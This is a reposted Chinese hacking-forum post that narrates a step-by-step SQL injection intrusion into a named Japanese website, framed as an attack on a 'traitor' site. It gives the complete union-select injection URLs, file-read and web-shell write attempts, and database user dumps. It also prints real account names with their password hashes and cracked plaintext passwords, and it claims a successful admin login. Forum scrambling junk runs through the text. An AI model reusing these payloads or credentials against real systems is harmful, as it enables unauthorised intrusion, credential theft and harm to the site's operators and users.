原创 检测汉奸站全过程

xiancda

补：www.zuaa.jp测试

" z6 C1 y( ~7 t$ H0x01. 检测 www.zuaa.jp 收集数据
% }  N- _' |+ B7 n& w" a0 r" Y
3 j# g& P; J0 I4 z6 z0 a/ e% {) S  q
0 h, ]. Y: [4 L1 a2 H  ewhatweb
9 H% n" F8 q* S2 }6 e0 P1 |- x4 |" O. Z
1 ~- {7 g6 h. |1 X' X7 {4 h/ E( y
利用NMAP扫描

* b: i! U) w! s; }( H6 ?% S" ^! w- m中国网络渗透测评联盟：http://www.political-security.com/ 提供技术支持
0x02.找注入点
找注入点：http://www.zuaa.jp/php/newsdetail.php?topic_id=390
+ ]9 z  Z2 E8 F  B: I4 W* I

0x03.order by
3 f0 z, y% _5 W% E$ D6 M3 q, \             http://www.zuaa.jp/php/newsdetail.php?topic_id=390 order by 1

& _" s$ [  n0 F' `+ }/ Morder by 28报错，order by 27正常
4 z# {6 j6 y% t: ?- L% v
0x04.   union手动查询
http://www.zuaa.jp/php/newsdetail.php?topic_id=198%20and%201=2%20union%20select%201,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27
添加到 27 时正常显示

5 t4 |( R$ x7 U8 P3 x中国网络渗透测评联盟：http://www.political-security.com/ 提供技术支持
  V. v& L; ~0 G# P2 G8 B! o( j8 s
& F) q3 E% k* Q1 h$ G0x05. info:
! u. m# F* P6 e6 [( xhttp://www.zuaa.jp/php/newsdetail.php?topic_id=198%20and%201=2%20union%20select%201,2,group_concat(user(),0x3a,database(),0x3a,version(),0x3a,@@version_conpile_os),4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27

2 m: |* j/ `8 m4 d) D  Vuser:            root@localhost
database:    openpne
& w" Y, o' e( T7 Nversion:      4.1.22
# A8 q" y2 s6 E/ {) ]; pos:             portbld-freebsd5.4
+ \: ]: f1 ^: Y1 W8 P$ x0 ^
0x06. root用户
利用 load_file(0x...), 读文件 (/etc/passwd), 也可以这样 hex(load_file(0x.....)), 然后把得到的 hex ,再转换成字符的（这种方法， 可以过大多数站）
http://www.zuaa.jp/php/newsdetail.php?topic_id=198%20and%201=2%20union%20select%201,2,hex(load_file(0x2f6574632f706173737764)),4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27

0 u, {) ]# J$ W通过工具转换

' ^. X2 e6 [% J& H中国网络渗透测评联盟：http://www.political-security.com/ 提供技术支持

0x07. 利用 into outfile
5 j2 |5 s& ^9 i* z* W  w! ~; D% J; p全部都失败
http://www.zuaa.jp/php/newsdetail.php?topic_id=-390+UNION+SELECT+1,2,0x31,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27+into+outfile+'/usr/home/zuaa_tech/WEBSITE/htdocs/php/help.php
1 @! W9 ?$ x. D+ z3 y/ k2 _
; _4 z9 r! v6 ~$ m% W/ n: Ihttp://www.zuaa.jp/php/newsdetail.php?topic_id=-390+UNION+SELECT+1,2,0x31,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27+into+outfile+'/usr/home/qian/OpenPNE/lib/help.php

页面显示“MDB2 Error:syntax error”

( t/ t% x8 b1 {0 K) ^) K" c& K0x08. 利用 mysql 4.1
2 r2 W3 o' y1 s' `, m. O$ M猜常规表名，字段未果 工具 sqlmap
中国网络渗透测评联盟：http://www.political-security.com/ 提供技术支持

' l0 J& M7 n$ M) |

0x09. 查找后台
利用 现有的各种 后台工具尝试都不行
$ s3 P4 l; D) s6 R$ [
0x10.  MySL外联方法
* u; T9 n# L" h4 h3 M从前面 nmap 收集的信息当中，可以看到开了 mysql 3306 端口 ,尝试得 mysql 用户各密码，然后再通过 mysql 工具外连 www.zuaa.jp 不行
2 o4 T6 b' Y* h& ?2 y3 s/ F可以利用 mysql ( 4.x 5.) 自带的定义表 mysql.user
http://www.zuaa.jp/php/newsdetail.php?topic_id=-390+UNION+SELECT+1,2,group_concat(user,0x3a,password),4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27+from+mysql.user

- P% p$ K% c8 Y) g这个可以在 www.cmd5.com 解密
root:*3711D518F2924AEFA6F4C6B4B7425CAE8BEB88AB zuaa2009
2 G1 c4 }: s% d# n4 f- r: y  G. Nchen:*2A09A939E6B654877DD70B00EA631D1007E58CC9 silkroad97
openpne:*5D80C62EC4D258534F 07D08CCE9CE27DFF26A366 ???
zuaa:*5D80C62EC4D258534F07D08CCE9CE27DFF26A366 ???
工具外连失败，据说防火墙策略只允许特定IP外连，具体不得知


0x11. 网站突破
7 q( L1 C( {5 U$ q( h* Q. B! R发现网站的源程序 openpne, google 下载 openpne 源码
! w5 D, I) A. }- d. F( P3 ]

. P5 w- X! X2 g( ^5 I6 s- a0x12. 默认信息利用
! Z/ g9 M0 W+ r) E) ]6 ^http://sns.zuaa.jp/?m=admin&a=page_login

表名 (c_admin_user) ，字段名（username,password）
http://www.zuaa.jp/php/newsdetail.php?topic_id=-390+UNION+SELECT+1,2,group_concat(username,0x3a,password),4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27+from+c_admin_user
* w# D  z+ Q- Y" X
; z7 y* @7 [, M' s( Q- P解密
zuaa_tech:dd041e2 b1b8ecee164a6cb196a496eda,               zuaa2009
- h1 X& |. A! }0 |) yzuaajp:c0923ec5857796a393da99905008c176,          zju1897
; \5 |5 N; s9 o6 r7 P* t
, b+ t$ ~" H" a. q( x' E中国网络渗透测评联盟：http://www.political-security.com/ 提供技术支持

! \# h, ]; B; z3 x4 _0x13. 登录后台


: p; |) j/ Q! {" _3 A- N
, _5 T( t) W. g" G0x14. 小结
利用网站相关信息，进行突破 利用网站相关信息，进行突破 利用网站相关信息，进行突破 利用网站相关信息，进行突破 。
感谢群 ---- 渗透 -酷帅王子 提供注入点 提供注入点
1 P3 d/ `3 b3 w; d------------------------------------------------------- ------------------------------------------------------- ------------------------------------------------------- ------------------------------------------------------- ------------------------------------------------------- ------------------------------------------------------- ------------------------------------------------------- ------------------------------------------------------- ------------------------------------------------------- ------------------------------------------------------- ------------------------------------------------------- ------------------------------------------------------- ------------------------------------------------------- ------------------------------------------------------- ------------------------------------------------------- ------------------------------------------------------- ------------------------------------------------------- ------------------------------------------------------- ------------------------------------------------------- ------------------------------------------------------- -------------------------------------------------------By DarkRain
; s' e) e: k- m" n, i$ O中国网络渗透测评联盟：http://www.political-security.com/ 提供技术支持

7 d5 @' O4 G1 n) y; Z3 s最后声明：本人只负责了整理上传到论坛，让大家学习，不是原作者，原作者辛苦了！

荒村狂客

哪个牛人 费的这劲 入侵的